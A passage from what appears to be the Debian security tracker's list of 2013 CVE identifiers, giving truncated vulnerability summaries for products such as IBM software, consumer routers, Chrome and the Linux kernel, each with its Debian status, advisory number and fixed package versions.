Explorer 9 and 10 allows remote attackers to execut ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3113 (Microsoft Internet Explorer 6 through 10 allows remote attackers to ex ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3112 (Microsoft Internet Explorer 6 through 10 allows remote attackers to ex ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3111 (Microsoft Internet Explorer 8 through 10 allows remote attackers to ex ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3110 (Microsoft Internet Explorer 8 and 9 allows remote attackers to execute ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-3109 RESERVED CVE-2013-3108 RESERVED CVE-2013-3107 (VMware vCenter Server 5.1 before Update 1, when anonymous LDAP binding ...) NOT-FOR-US: vCenter CVE-2013-3106 (Multiple cross-site scripting (XSS) vulnerabilities in Open-Xchange Ap ...) NOT-FOR-US: Open-Xchange CVE-2013-3105 RESERVED CVE-2013-3104 RESERVED CVE-2013-3103 RESERVED CVE-2013-3102 RESERVED CVE-2013-3101 RESERVED CVE-2013-3100 RESERVED CVE-2013-3099 RESERVED CVE-2013-3098 (Multiple cross-site request forgery (CSRF) vulnerabilities in TRENDnet ...) NOT-FOR-US: TRENDnet TEW-812DRU router CVE-2013-3097 (Unspecified Cross-site scripting (XSS) vulnerability in the Verizon FI ...) NOT-FOR-US: Verizon CVE-2013-3096 (D-Link DIR865L v1.03 suffers from an "Unauthenticated Hardware Linking ...) NOT-FOR-US: D-Link CVE-2013-3095 (Multiple cross-site request forgery (CSRF) vulnerabilities in D-Link D ...) NOT-FOR-US: D-Link CVE-2013-3094 RESERVED CVE-2013-3093 (ASUS RT-N56U devices allow CSRF. ...) NOT-FOR-US: ASUS RT-N56U devices CVE-2013-3092 (The Belkin N300 (F7D7301v1) router allows remote attackers to bypass a ...) NOT-FOR-US: Belkin router CVE-2013-3091 (An Authentication Bypass vulnerability in Belkin N300 (F7D7301v1) rout ...) NOT-FOR-US: Belkin N300 router CVE-2013-3090 (Multiple cross-site scripting (XSS) vulnerabilities in Belkin N300 rou ...) NOT-FOR-US: Belkin N300 router CVE-2013-3089 (Cross-site request forgery (CSRF) vulnerability in apply.cgi in Belkin ...) NOT-FOR-US: Belkin N300 CVE-2013-3088 (Belkin N900 router (F9K1104v1) contains an Authentication Bypass using ...) NOT-FOR-US: Belkin N900 router CVE-2013-3087 (Multiple cross-site scripting (XSS) vulnerabilities in Belkin N900 rou ...) NOT-FOR-US: Belkin N900 router CVE-2013-3086 (Cross-site request forgery (CSRF) vulnerability in util_system.html in ...) NOT-FOR-US: Belkin N900 CVE-2013-3085 (An authentication bypass exists in the web management interface in Bel ...) NOT-FOR-US: Belkin CVE-2013-3084 (Multiple cross-site scripting (XSS) vulnerabilities in Belkin Model F5 ...) NOT-FOR-US: Belkin router CVE-2013-3083 (Cross-site request forgery (CSRF) vulnerability in cgi-bin/system_sett ...) NOT-FOR-US: Belkin CVE-2013-3082 (Cross-site scripting (XSS) vulnerability in plugins/jojo_core/forgot_p ...) NOT-FOR-US: Jojo CMS CVE-2013-3081 (SQL injection vulnerability in the checkEmailFormat function in plugin ...) NOT-FOR-US: Jojo CMS CVE-2013-3080 (VMware vCenter Server Appliance (vCSA) 5.1 before Update 1 allows remo ...) NOT-FOR-US: vCenter CVE-2013-3079 (VMware vCenter Server Appliance (vCSA) 5.1 before Update 1 allows remo ...) NOT-FOR-US: vCenter CVE-2013-3078 RESERVED CVE-2013-3077 (Multiple integer overflows in the IP_MSFILTER and IPV6_MSFILTER featur ...) {DSA-2743-1} - kfreebsd-8 (bug #720470) [wheezy] - kfreebsd-8 8.3-6+deb7u1 [squeeze] - kfreebsd-8 (Unsupported in squeeze-lts) - kfreebsd-9 9.2~svn254368-2 (bug #720468) - kfreebsd-10 10.0~svn254663-1 (bug #720471) CVE-2013-3076 (The crypto API in the Linux kernel through 3.9-rc8 does not initialize ...) {DSA-2669-1} - linux 3.8.11-1 (low) - linux-2.6 (Vulnerable code not present) CVE-2013-3075 (Multiple buffer overflows in ActUWzd.dll 1.0.0.1 in Mitsubishi MX Comp ...) NOT-FOR-US: Mitsubishi MX Component 3 CVE-2013-3074 (NetGear WNDR4700 Media Server devices with firmware 1.0.0.34 allow rem ...) NOT-FOR-US: NetGear WNDR4700 Media Server devices CVE-2013-3073 (A Symlink Traversal vulnerability exists in NETGEAR Centria WNDR4700 F ...) NOT-FOR-US: NETGEAR CVE-2013-3072 (An Authentication Bypass vulnerability exists in NETGEAR Centria WNDR4 ...) NOT-FOR-US: NETGEAR CVE-2013-3071 (NETGEAR Centria WNDR4700 devices with firmware 1.0.0.34 allow authenti ...) NOT-FOR-US: NETGEAR Centria WNDR4700 devices CVE-2013-3070 (An Information Disclosure vulnerability exists in Netgear WNDR4700 run ...) NOT-FOR-US: NETGEAR CVE-2013-3069 (Multiple cross-site scripting (XSS) vulnerabilities in NETGEAR WNDR470 ...) NOT-FOR-US: NETGEAR devices CVE-2013-3068 (Cross-site request forgery (CSRF) vulnerability in apply.cgi in Linksy ...) NOT-FOR-US: Linksys CVE-2013-3067 (Linksys WRT310Nv2 2.0.0.1 is vulnerable to XSS. ...) NOT-FOR-US: Linksys CVE-2013-3066 (Linksys EA6500 with firmware 1.1.28.147876 does not properly restrict ...) NOT-FOR-US: Linksys CVE-2013-3065 (Cross-site scripting (XSS) vulnerability in the Parental Controls sect ...) NOT-FOR-US: Linksys CVE-2013-3064 (Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA ...) NOT-FOR-US: Linksys CVE-2013-3063 (SAP BASIS Communication Services 4.6B through 7.30 allows remote authe ...) NOT-FOR-US: SAP BASIS Communication Services CVE-2013-3062 (The CP_RC_TRANSACTION_CALL_BY_SET function in the Engineering Workbenc ...) NOT-FOR-US: SAP CVE-2013-3061 (The ISHMED-PATRED_TRANSACT_RFCCALL function in the IS-H Industry-Speci ...) NOT-FOR-US: SAP CVE-2013-3060 (The web console in Apache ActiveMQ before 5.8.0 does not require authe ...) - activemq (Web console not provided in Debian package, see #702670) CVE-2013-3059 (Cross-site scripting (XSS) vulnerability in the Voting plugin in Jooml ...) NOT-FOR-US: Joomla! CVE-2013-3058 (Cross-site scripting (XSS) vulnerability in Joomla! 2.5.x before 2.5.1 ...) NOT-FOR-US: Joomla! CVE-2013-3057 (Joomla! 2.5.x before 2.5.10 and 3.0.x before 3.0.4 allows remote authe ...) NOT-FOR-US: Joomla! CVE-2013-3056 (Joomla! 2.5.x before 2.5.10 and 3.0.x before 3.0.4 allows remote authe ...) NOT-FOR-US: Joomla! CVE-2013-3055 (Lexmark Markvision Enterprise before 1.8 provides a diagnostic interfa ...) NOT-FOR-US: Lexmark Markvision Enterprise CVE-2013-3054 RESERVED CVE-2013-3053 RESERVED CVE-2013-3052 RESERVED CVE-2013-3051 (The TrustZone kernel, when used in conjunction with a certain Motorola ...) NOT-FOR-US: TrustZone kernel CVE-2013-3050 (SQL injection vulnerability in ZAPms 1.41 and earlier allows remote at ...) NOT-FOR-US: ZAPms CVE-2013-3049 (IBM Maximo Asset Management 7.1 through 7.1.1.12 and 7.5 before 7.5.0. ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2013-3048 (Cross-site scripting (XSS) vulnerability in IBM Maximo Asset Managemen ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2013-3047 (IBM Maximo Asset Management 7.1 before 7.1.1.12 and 7.5 before 7.5.0.5 ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2013-3046 (The Meeting Server in IBM Sametime 8.x through 8.5.2.1 and 9.x through ...) NOT-FOR-US: IBM Sametime CVE-2013-3045 (The Enterprise Meeting Server in IBM Lotus Sametime 8.5.2 and 8.5.2.1 ...) NOT-FOR-US: IBM CVE-2013-3044 (The Enterprise Meeting Server in IBM Lotus Sametime 8.5.2 and 8.5.2.1 ...) NOT-FOR-US: IBM CVE-2013-3043 (Directory traversal vulnerability in the client in IBM Rational Softwa ...) NOT-FOR-US: IBM CVE-2013-3042 (Directory traversal vulnerability in the server in IBM Rational Softwa ...) NOT-FOR-US: IBM CVE-2013-3041 (The Web Client in IBM Rational ClearQuest 7.1 before 7.1.2.12, 8.0 bef ...) NOT-FOR-US: IBM CVE-2013-3040 (IBM InfoSphere Information Server through 8.5 FP3, 8.7 through FP2, an ...) NOT-FOR-US: IBM InfoSphere Information Server CVE-2013-3039 (IBM Rational Requirements Composer before 4.0.4 does not properly perf ...) NOT-FOR-US: IBM Rational Requirements Composer CVE-2013-3038 (Unspecified vulnerability in IBM Rational Requirements Composer before ...) NOT-FOR-US: IBM Rational Requirements Composer CVE-2013-3037 (Unspecified vulnerability in IBM Rational Requirements Composer before ...) NOT-FOR-US: IBM Rational Requirements Composer CVE-2013-3036 (Open redirect vulnerability in IBM Rational Requirements Composer befo ...) NOT-FOR-US: IBM Rational Requirements Composer CVE-2013-3035 (The IPv6 implementation in the inet subsystem in IBM AIX 6.1 and 7.1, ...) NOT-FOR-US: IBM AIX CVE-2013-3034 (Cross-site scripting (XSS) vulnerability in IBM InfoSphere Information ...) NOT-FOR-US: IBM InfoSphere Information Server CVE-2013-3033 (SQL injection vulnerability in the server component in IBM Tivoli Remo ...) NOT-FOR-US: IBM Tivoli Remote Control CVE-2013-3032 (Cross-site scripting (XSS) vulnerability in the MIME e-mail functional ...) NOT-FOR-US: IBM Domino CVE-2013-3031 (A SQL stored procedure in the Universal Cache component in IBM solidDB ...) NOT-FOR-US: IBM CVE-2013-3030 (The servlet gateway in IBM Cognos Business Intelligence 8.4.1 before I ...) NOT-FOR-US: IBM CVE-2013-3029 (Cross-site request forgery (CSRF) vulnerability in the Administrative ...) NOT-FOR-US: IBM WebSphere CVE-2013-3028 (Multiple buffer overflows in mqm programs in IBM WebSphere MQ 7.0.x be ...) NOT-FOR-US: IBM WebSphere CVE-2013-3027 (Integer overflow in the DWA9W ActiveX control in iNotes in IBM Domino ...) NOT-FOR-US: IBM Domino CVE-2013-3026 (Buffer overflow in the Lotus Quickr for Domino ActiveX control in qp2. ...) NOT-FOR-US: Lotus Quickr for Domino ActiveX CVE-2013-3025 (Multiple cross-site scripting (XSS) vulnerabilities in IBM Rational Fo ...) NOT-FOR-US: IBM CVE-2013-3024 (IBM WebSphere Application Server (WAS) 8.5 through 8.5.0.2 on UNIX all ...) NOT-FOR-US: IBM CVE-2013-3023 (IBM Tivoli Application Dependency Discovery Manager (TADDM) 7.1.2 and ...) NOT-FOR-US: IBM CVE-2013-3022 REJECTED CVE-2013-3021 RESERVED CVE-2013-3020 (IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 ...) NOT-FOR-US: IBM CVE-2013-3019 RESERVED CVE-2013-3018 (The AXIS webapp in deploy-tomcat/axis in IBM Tivoli Application Depend ...) NOT-FOR-US: IBM CVE-2013-3017 (IBM Tivoli Application Dependency Discovery Manager (TADDM) before 7.2 ...) NOT-FOR-US: IBM CVE-2013-3016 (IBM WebSphere Portal 6.1, 7.0, and 8.0 allows remote attackers to acce ...) NOT-FOR-US: IBM WebSphere CVE-2013-3015 RESERVED CVE-2013-3014 RESERVED CVE-2013-3013 RESERVED CVE-2013-3012 (Unspecified vulnerability in the Java Runtime Environment (JRE) in IBM ...) NOT-FOR-US: IBM JDK CVE-2013-3011 (Unspecified vulnerability in the Java Runtime Environment (JRE) in IBM ...) NOT-FOR-US: IBM JDK CVE-2013-3010 (Unspecified vulnerability in the Java Runtime Environment (JRE) in IBM ...) NOT-FOR-US: IBM JDK CVE-2013-3009 (The com.ibm.CORBA.iiop.ClientDelegate class in IBM Java 1.4.2 before 1 ...) NOT-FOR-US: IBM JDK CVE-2013-3008 (Unspecified vulnerability in the Java Runtime Environment (JRE) in IBM ...) NOT-FOR-US: IBM JDK CVE-2013-3007 (Unspecified vulnerability in the Java Runtime Environment (JRE) in IBM ...) NOT-FOR-US: IBM JDK CVE-2013-3006 (Unspecified vulnerability in the Java Runtime Environment (JRE) in IBM ...) NOT-FOR-US: IBM JDK CVE-2013-3005 (The TFTP client in IBM AIX 6.1 and 7.1, and VIOS 2.2.2.2-FP-26 SP-02, ...) NOT-FOR-US: TFTP client in IBM AIX CVE-2013-3004 (Directory traversal vulnerability in BIRT-Report Viewer in IBM Tivoli ...) NOT-FOR-US: IBM Tivoli Application Dependency Discovery Manager CVE-2013-3003 (Unspecified vulnerability in SOAP Gateway in IBM IMS Enterprise Suite ...) NOT-FOR-US: IBM CVE-2013-3002 RESERVED CVE-2013-3001 (Directory traversal vulnerability in IBM InfoSphere Data Replication D ...) NOT-FOR-US: IBM CVE-2013-3000 (SQL injection vulnerability in IBM InfoSphere Data Replication Dashboa ...) NOT-FOR-US: IBM CVE-2013-2999 (Cross-site scripting (XSS) vulnerability in IBM InfoSphere Data Replic ...) NOT-FOR-US: IBM CVE-2013-2998 (frontcontroller.jsp in IBM Maximo Asset Management 7.x before 7.5.0.6 ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2013-2997 (IBM Security AppScan Enterprise before 8.7 does not invalidate the ses ...) NOT-FOR-US: IBM CVE-2013-2996 RESERVED CVE-2013-2995 RESERVED CVE-2013-2994 (IBM WebSphere Commerce 7.0 Feature Pack 4 and Feature Pack 5 incorrect ...) NOT-FOR-US: IBM CVE-2013-2993 (IBM WebSphere Commerce 6.x through 6.0.0.11 and 7.x through 7.0.0.7 do ...) NOT-FOR-US: IBM CVE-2013-2992 (The Search component in IBM WebSphere Commerce 7.0 FP4 through FP6, in ...) NOT-FOR-US: IBM CVE-2013-2991 REJECTED CVE-2013-2990 REJECTED CVE-2013-2989 (The file-copying functionality in IBM Sterling Connect:Direct 3.8.00, ...) NOT-FOR-US: IBM CVE-2013-2988 (Absolute path traversal vulnerability in the server in IBM Cognos Busi ...) NOT-FOR-US: IBM Cognos CVE-2013-2987 (IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 ...) NOT-FOR-US: IBM CVE-2013-2986 REJECTED CVE-2013-2985 (IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 ...) NOT-FOR-US: IBM CVE-2013-2984 (Directory traversal vulnerability in IBM Sterling B2B Integrator 5.1 a ...) NOT-FOR-US: IBM CVE-2013-2983 (Multiple cross-site scripting (XSS) vulnerabilities in IBM Sterling Fi ...) NOT-FOR-US: IBM CVE-2013-2982 (IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 ...) NOT-FOR-US: IBM CVE-2013-2981 (Directory traversal vulnerability in the Web Console in IBM Data Studi ...) NOT-FOR-US: IBM Data Studio CVE-2013-2980 (Cross-site request forgery (CSRF) vulnerability in the Web Console in ...) NOT-FOR-US: IBM Data Studio CVE-2013-2979 (Directory traversal vulnerability in IBM Optim Performance Manager 4.1 ...) NOT-FOR-US: IBM CVE-2013-2978 (Absolute path traversal vulnerability in the server in IBM Cognos Busi ...) NOT-FOR-US: IBM Cognos CVE-2013-2977 (Integer overflow in IBM Notes 8.5.x before 8.5.3 FP4 Interim Fix 1 and ...) NOT-FOR-US: IBM Notes CVE-2013-2976 (The Administrative console in IBM WebSphere Application Server (WAS) 6 ...) NOT-FOR-US: IBM CVE-2013-2975 RESERVED CVE-2013-2974 (The BIRT viewer in IBM Tivoli Application Dependency Discovery Manager ...) NOT-FOR-US: IBM Tivoli Application Dependency Discovery Manager CVE-2013-2973 REJECTED CVE-2013-2972 (IBM WebSphere Cast Iron 6.3 allows remote attackers to bypass intended ...) NOT-FOR-US: IBM CVE-2013-2971 REJECTED CVE-2013-2970 (Unspecified vulnerability in IBM QRadar Security Information and Event ...) NOT-FOR-US: IBM CVE-2013-2969 (Cross-site scripting (XSS) vulnerability in IBM Sterling Control Cente ...) NOT-FOR-US: IBM Sterling Control Center CVE-2013-2968 (An unspecified buffer-read method in IBM Sterling Control Center (SCC) ...) NOT-FOR-US: IBM Sterling Control Center CVE-2013-2967 (Cross-site scripting (XSS) vulnerability in the Administrative console ...) NOT-FOR-US: IBM WebSphere Application Server CVE-2013-2966 RESERVED CVE-2013-2965 RESERVED CVE-2013-2964 (Buffer overflow in dsmtca in IBM Tivoli Storage Manager (TSM) through ...) NOT-FOR-US: IBM Tivoli Storage Manager CVE-2013-2963 RESERVED CVE-2013-2962 (Buffer overflow in the Launcher in IBM WebSphere Transformation Extend ...) NOT-FOR-US: IBM WebSphere Transformation Extender CVE-2013-2961 (The internal web server in the Basic Services component in IBM Tivoli ...) NOT-FOR-US: IBM Tivoli CVE-2013-2960 (Buffer overflow in KDSMAIN in the Basic Services component in IBM Tivo ...) NOT-FOR-US: IBM Tivoli CVE-2013-2959 (The Console in IBM InfoSphere Optim Data Growth for Oracle E-Business ...) NOT-FOR-US: IBM CVE-2013-2958 RESERVED CVE-2013-2957 (Cross-site scripting (XSS) vulnerability in IBM InfoSphere Optim Data ...) NOT-FOR-US: IBM CVE-2013-2956 (SQL injection vulnerability in the Console in IBM InfoSphere Optim Dat ...) NOT-FOR-US: IBM CVE-2013-2955 (Cross-site scripting (XSS) vulnerability in IBM InfoSphere Optim Data ...) NOT-FOR-US: IBM CVE-2013-2954 (The login page in the Console in IBM InfoSphere Optim Data Growth for ...) NOT-FOR-US: IBM CVE-2013-2953 (IBM InfoSphere Optim Data Growth for Oracle E-Business Suite 6.x, 7.x, ...) NOT-FOR-US: IBM CVE-2013-2952 RESERVED CVE-2013-2951 (IBM WebSphere Portal 7.0.0.x and 8.0.0.x write passwords to a trace fi ...) NOT-FOR-US: IBM CVE-2013-2950 (CRLF injection vulnerability in IBM WebSphere Portal 6.1.0.x before 6. ...) NOT-FOR-US: IBM WebSphere CVE-2013-2949 RESERVED CVE-2013-2948 RESERVED CVE-2013-2947 RESERVED CVE-2013-2946 RESERVED CVE-2013-2945 (SQL injection vulnerability in blogs/admin.php in b2evolution before 4 ...) NOT-FOR-US: b2evolution CVE-2013-2944 (strongSwan 4.3.5 through 5.0.3, when using the OpenSSL plugin for ECDS ...) {DSA-2665-1} - strongswan 4.6.4-7 CVE-2013-2943 RESERVED CVE-2013-2942 RESERVED CVE-2013-2941 RESERVED CVE-2013-2940 (Unspecified vulnerability in Citrix CloudPortal Services Manager (aka ...) NOT-FOR-US: Citrix CloudPortal Services Manager CVE-2013-2939 (Unspecified vulnerability in Citrix CloudPortal Services Manager (aka ...) NOT-FOR-US: Citrix CloudPortal Services Manager CVE-2013-2938 (Unspecified vulnerability in Citrix CloudPortal Services Manager (aka ...) NOT-FOR-US: Citrix CloudPortal Services Manager CVE-2013-2937 (Unspecified vulnerability in Citrix CloudPortal Services Manager (aka ...) NOT-FOR-US: Citrix CloudPortal Services Manager CVE-2013-2936 (Unspecified vulnerability in Citrix CloudPortal Services Manager (aka ...) NOT-FOR-US: Citrix CloudPortal Services Manager CVE-2013-2935 (Unspecified vulnerability in Citrix CloudPortal Services Manager (aka ...) NOT-FOR-US: Citrix CloudPortal Services Manager CVE-2013-2934 (Citrix CloudPortal Services Manager (aka Cortex) 10.0 before Cumulativ ...) NOT-FOR-US: Citrix CloudPortal Services Manager CVE-2013-2933 (Unspecified vulnerability in Citrix CloudPortal Services Manager (aka ...) NOT-FOR-US: Citrix CloudPortal Services Manager CVE-2013-2932 RESERVED CVE-2013-2931 (Multiple unspecified vulnerabilities in Google Chrome before 31.0.1650 ...) {DSA-2799-1} - chromium-browser 31.0.1650.57-1 [squeeze] - chromium-browser CVE-2013-2930 (The perf_trace_event_perm function in kernel/trace/trace_event_perf.c ...) - linux-2.6 (Introduced in v3.4) [wheezy] - linux (Introduced in v3.4) - linux 3.11.8-1 NOTE: Introduced by ced39002f5ea CVE-2013-2929 (The Linux kernel before 3.12.2 does not properly use the get_dumpable ...) {DSA-2906-1} - linux-2.6 - linux 3.11.10-1 [wheezy] - linux 3.2.53-2 CVE-2013-2928 (Multiple unspecified vulnerabilities in Google Chrome before 30.0.1599 ...) {DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser CVE-2013-2927 (Use-after-free vulnerability in the HTMLFormElement::prepareForSubmiss ...) {DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser CVE-2013-2926 (Use-after-free vulnerability in the IndentOutdentCommand::tryIndenting ...) {DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser CVE-2013-2925 (Use-after-free vulnerability in core/xml/XMLHttpRequest.cpp in Blink, ...) {DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser CVE-2013-2924 (Use-after-free vulnerability in International Components for Unicode ( ...) {DSA-2786-1 DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser - icu 4.8.1.1-13+nmu1 (bug #726477) CVE-2013-2923 (Multiple unspecified vulnerabilities in Google Chrome before 30.0.1599 ...) {DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser CVE-2013-2922 (Use-after-free vulnerability in core/html/HTMLTemplateElement.cpp in B ...) {DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser CVE-2013-2921 (Double free vulnerability in the ResourceFetcher::didLoadResource func ...) {DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser CVE-2013-2920 (The DoResolveRelativeHost function in url/url_canon_relative.cc in Goo ...) {DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser CVE-2013-2919 (Google V8, as used in Google Chrome before 30.0.1599.66, allows remote ...) {DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser - libv8 [wheezy] - libv8 (Minor issue, Chromium in Wheezy uses its own fixed copy) [squeeze] - libv8 (Unsupported in squeeze-lts) - libv8-3.14 (unimportant; bug #773671) NOTE: libv8 not covered by security support CVE-2013-2918 (Use-after-free vulnerability in the RenderBlock::collapseAnonymousBloc ...) {DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser CVE-2013-2917 (The ReverbConvolverStage::ReverbConvolverStage function in core/platfo ...) {DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser CVE-2013-2916 (Blink, as used in Google Chrome before 30.0.1599.66, allows remote att ...) {DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser CVE-2013-2915 (Google Chrome before 30.0.1599.66 preserves pending NavigationEntry ob ...) {DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser CVE-2013-2914 (Use-after-free vulnerability in the color-chooser dialog in Google Chr ...) - chromium-browser (windows-specific issue) CVE-2013-2913 (Use-after-free vulnerability in the XMLDocumentParser::append function ...) {DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser CVE-2013-2912 (Use-after-free vulnerability in the PepperInProcessRouter::SendToHost ...) {DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser CVE-2013-2911 (Use-after-free vulnerability in the XSLStyleSheet::compileStyleSheet f ...) {DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser CVE-2013-2910 (Use-after-free vulnerability in modules/webaudio/AudioScheduledSourceN ...) {DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser CVE-2013-2909 (Use-after-free vulnerability in Blink, as used in Google Chrome before ...) {DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser CVE-2013-2908 (Google Chrome before 30.0.1599.66 uses incorrect function calls to det ...) {DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser CVE-2013-2907 (The Window.prototype object implementation in Google Chrome before 30. ...) {DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser CVE-2013-2906 (Multiple race conditions in the Web Audio implementation in Blink, as ...) {DSA-2785-1} - chromium-browser 30.0.1599.101-1 [squeeze] - chromium-browser CVE-2013-2905 (The SharedMemory::Create function in memory/shared_memory_posix.cc in ...) {DSA-2741-1} - chromium-browser 29.0.1547.57-1 [squeeze] - chromium-browser CVE-2013-2904 (Use-after-free vulnerability in the Document::finishedParsing function ...) {DSA-2741-1} - chromium-browser 29.0.1547.57-1 [squeeze] - chromium-browser CVE-2013-2903 (Use-after-free vulnerability in the HTMLMediaElement::didMoveToNewDocu ...) {DSA-2741-1} - chromium-browser 29.0.1547.57-1 [squeeze] - chromium-browser CVE-2013-2902 (Use-after-free vulnerability in the XSLT ProcessingInstruction impleme ...) {DSA-2741-1} - chromium-browser 29.0.1547.57-1 [squeeze] - chromium-browser - libxslt (according to https://chromiumcodereview.appspot.com/20856002 this is an issue on chromium's side of xslt handling) CVE-2013-2901 (Multiple integer overflows in (1) libGLESv2/renderer/Renderer9.cpp and ...) {DSA-2741-1} - chromium-browser 29.0.1547.57-1 [squeeze] - chromium-browser CVE-2013-2900 (The FilePath::ReferencesParent function in files/file_path.cc in Googl ...) {DSA-2741-1} - chromium-browser 29.0.1547.57-1 [squeeze] - chromium-browser CVE-2013-2899 (drivers/hid/hid-picolcd_core.c in the Human Interface Device (HID) sub ...) - linux 3.10.11-1 (low) [wheezy] - linux 3.2.51-1 - linux-2.6 (driver introduced in 2.6.35) CVE-2013-2898 (drivers/hid/hid-sensor-hub.c in the Human Interface Device (HID) subsy ...) - linux 3.10.11-1 (low) [wheezy] - linux (driver introduced in 3.7) - linux-2.6 (driver introduced in 3.7) CVE-2013-2897 (Multiple array index errors in drivers/hid/hid-multitouch.c in the Hum ...) - linux 3.11.5-1 (low) - linux-2.6 (driver introduced in 2.6.38) [wheezy] - linux 3.2.53-1 CVE-2013-2896 (drivers/hid/hid-ntrig.c in the Human Interface Device (HID) subsystem ...) - linux 3.10.11-1 (low) [wheezy] - linux 3.2.51-1 - linux-2.6 (Vulnerable feature probing code not present) CVE-2013-2895 (drivers/hid/hid-logitech-dj.c in the Human Interface Device (HID) subs ...) - linux 3.11.5-1 (low) - linux-2.6 (driver introduced in 3.2) [wheezy] - linux 3.2.53-1 CVE-2013-2894 (drivers/hid/hid-lenovo-tpkbd.c in the Human Interface Device (HID) sub ...) - linux 3.11.5-1 (low) [wheezy] - linux (driver introduced in 3.6) - linux-2.6 (driver introduced in 3.6) CVE-2013-2893 (The Human Interface Device (HID) subsystem in the Linux kernel through ...) {DSA-2906-1} - linux 3.11.5-1 (low) - linux-2.6 (low) [wheezy] - linux 3.2.53-1 CVE-2013-2892 (drivers/hid/hid-pl.c in the Human Interface Device (HID) subsystem in ...) {DSA-2766-1} - linux 3.10.11-1 (low) [wheezy] - linux 3.2.51-1 - linux-2.6 (low) CVE-2013-2891 (drivers/hid/hid-steelseries.c in the Human Interface Device (HID) subs ...) - linux 3.11.5-1 (low) [wheezy] - linux (steelseries driver introduced in 3.9) - linux-2.6 (steelseries driver introduced in 3.9) CVE-2013-2890 (drivers/hid/hid-sony.c in the Human Interface Device (HID) subsystem i ...) - linux (buzz driver introduced in 3.11 cycle, only in experimental) - linux-2.6 (buzz driver introduced in 3.11 cycle) CVE-2013-2889 (drivers/hid/hid-zpff.c in the Human Interface Device (HID) subsystem i ...) {DSA-2906-1} - linux 3.11.5-1 (low) - linux-2.6 (low) [wheezy] - linux 3.2.53-1 CVE-2013-2888 (Multiple array index errors in drivers/hid/hid-core.c in the Human Int ...) {DSA-2766-1} - linux 3.10.11-1 - linux-2.6 [wheezy] - linux 3.2.51-1 CVE-2013-2887 (Multiple unspecified vulnerabilities in Google Chrome before 29.0.1547 ...) {DSA-2741-1} - chromium-browser 29.0.1547.57-1 [squeeze] - chromium-browser CVE-2013-2886 (Multiple unspecified vulnerabilities in Google Chrome before 28.0.1500 ...) {DSA-2732-1} - chromium-browser 28.0.1500.95-1 [squeeze] - chromium-browser CVE-2013-2885 (Use-after-free vulnerability in Google Chrome before 28.0.1500.95 allo ...) {DSA-2732-1} - chromium-browser 28.0.1500.95-1 [squeeze] - chromium-browser CVE-2013-2884 (Use-after-free vulnerability in the DOM implementation in Google Chrom ...) {DSA-2732-1} - chromium-browser 28.0.1500.95-1 [squeeze] - chromium-browser CVE-2013-2883 (Use-after-free vulnerability in Google Chrome before 28.0.1500.95 allo ...) {DSA-2732-1} - chromium-browser 28.0.1500.95-1 [squeeze] - chromium-browser CVE-2013-2882 (Google V8, as used in Google Chrome before 28.0.1500.95, allows remote ...) {DSA-2732-1} - chromium-browser 28.0.1500.95-1 [squeeze] - chromium-browser - libv8 [wheezy] - libv8 (Minor issue, Chromium in Wheezy uses its own fixed copy) [squeeze] - libv8 (Unsupported in squeeze-lts) - libv8-3.14 (unimportant; bug #773671) NOTE: libv8 not covered by security support CVE-2013-2881 (Google Chrome before 28.0.1500.95 does not properly handle frames, whi ...) {DSA-2732-1} - chromium-browser 28.0.1500.95-1 [squeeze] - chromium-browser CVE-2013-2880 (Multiple unspecified vulnerabilities in Google Chrome before 28.0.1500 ...) {DSA-2724-1} - chromium-browser 28.0.1500.71-1 [squeeze] - chromium-browser CVE-2013-2879 (Google Chrome before 28.0.1500.71 does not properly determine the circ ...) {DSA-2724-1} - chromium-browser 28.0.1500.71-1 [squeeze] - chromium-browser CVE-2013-2878 (Google Chrome before 28.0.1500.71 allows remote attackers to cause a d ...) {DSA-2724-1} - chromium-browser 28.0.1500.71-1 [squeeze] - chromium-browser CVE-2013-2877 (parser.c in libxml2 before 2.9.0, as used in Google Chrome before 28.0 ...) {DSA-2779-1 DSA-2724-1} - libxml2 2.9.1+dfsg1-1 (bug #715531) - chromium-browser 28.0.1500.71-1 [squeeze] - chromium-browser CVE-2013-2876 (browser/extensions/api/tabs/tabs_api.cc in Google Chrome before 28.0.1 ...) {DSA-2724-1} - chromium-browser 28.0.1500.71-1 [squeeze] - chromium-browser 